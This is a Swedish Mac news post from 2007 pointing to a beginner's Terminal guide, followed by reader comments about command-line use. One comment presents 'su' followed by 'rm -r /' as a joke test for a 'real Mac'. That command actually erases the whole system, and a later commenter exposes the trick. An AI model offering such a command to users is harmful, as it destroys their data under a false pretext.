Så använder du Terminal
Nybörjarguide
Terminalen är en läskig sak men som man faktiskt kan göra massor av roligt med. Eller inte roligt kanske, men i alla fall nyttigt.Alex Galonsky har börjat skriva en guide för nybörjare om hur man rör sig runt i textmiljön. Första delen är långt ifrån gigantisk men håll ett öga på sidan om du vill ha mer makt över din dator.
macapper.com
Mac,
Via
Digg / Apple
37.4°
0Roger Åberg
tors. 15 mar 2007, 11:53
11 kommentarer till artikeln
tack roger =)
av per, torsdag 15 mars 2007 kl 12:53
haha...undrade vadfan detta var för någe...
läste sedan Macfeber...
såå det är som command i windows?
av KoiKoi, torsdag 15 mars 2007 kl 13:04
Nu har jag dålig koll på command, men du kan väl inte göra så mycket där väl?
Detta är unik utan det grafiska skalet. Fult och äckligt, men ibland är det underbart.
av Roger Åberg, torsdag 15 mars 2007 kl 13:09
maccoy: som command ja.... Fast jevligt mycket större... Man kan tom surfa med webläsare som tex links eller lynx.. Jag kör även alla mina backup rutiner terminalbaserat...
av p2d, torsdag 15 mars 2007 kl 13:17
Command är en kastrerad smörkniv i dålig plast.
av Redglittercoffin, torsdag 15 mars 2007 kl 18:13
Alltså, terminalen är ju liksom det "riktiga" gränssnittet!
Någon gång ibland kan det ju vara mer bekvämt att göra saker i "färg" (som en bekant kallar att använda fönstersystem) men oftast är det enkalst i terminalen.
Men jag kan hålla med om jag är lite skadad på den punkten. :)
Jag brukar rekommendera denna sida om man är nybörjare med Terminal.
av kaktus, torsdag 15 mars 2007 kl 19:38
Det är inte svårare än att en datamaskin har mer än ett gränssnitt. Dels ett grafiskt (Graphical User Interface -- GUI) och dels ett 'Command Line Interface' (CLI).
Inget är mer än det andra.
För oss som varit med sedan -93 och även de som var med på 70 talet känns CLI'er lika hemma-mysigt som en burk Ben&Jerrys i favorit-fåtöljen tittandes på Fletch.
För övrigt rekomenderas en googling på "in the beginning was the command line" och ni skall finna en fantastiskt välskriven artikel!!
trevlig helg!
av apan, fredag 16 mars 2007 kl 15:31
Såhär kan ni kolla om ni har en riktig mac eller en kopia i terminalen. (Man måste enabla root först)
su [enter]
:root/admin psw
rm -r /
[Y]
(rm=realmac)
av congo schlong, lördag 17 mars 2007 kl 11:10
'man' är förkortning för manual, kör man 'man rm' ser man att rm betyder remove directory entries. Kan alltså vara en bra grej att kolla det man ska köra med man innnan man gör nått dumt.
Men det var ett lite roligt sätt att lura folk att radera hela sin burk. Frågan är dock vad som händer när rm raderat sig själv..?
av pontusuggla, lördag 17 mars 2007 kl 19:43
pontusuggla: Det blir troligtvis inget problem ur just den synvinkeln, binären är redan laddad i minnet så den kan fortsätta utföra sitt arbete.
av Henkis, måndag 19 mars 2007 kl 01:26
Kommentera artikeln
+
Per månad
39 kr
Betala löpande per månad. Ingen bindningstid.
Starta prenumeration
Per år
299 kr
Enklast och billigast, bara 25 kronor i månaden. Betala löpande per år. Ingen bindningstid.
Prova 14 dagar gratis innan du bestämmer dig.
Starta gratis provperiod
Engångsköp
349 kr
Slipp återkommande betalningar, betala ett år i taget. Betala med kort eller Swish.
Köp utan prenumeration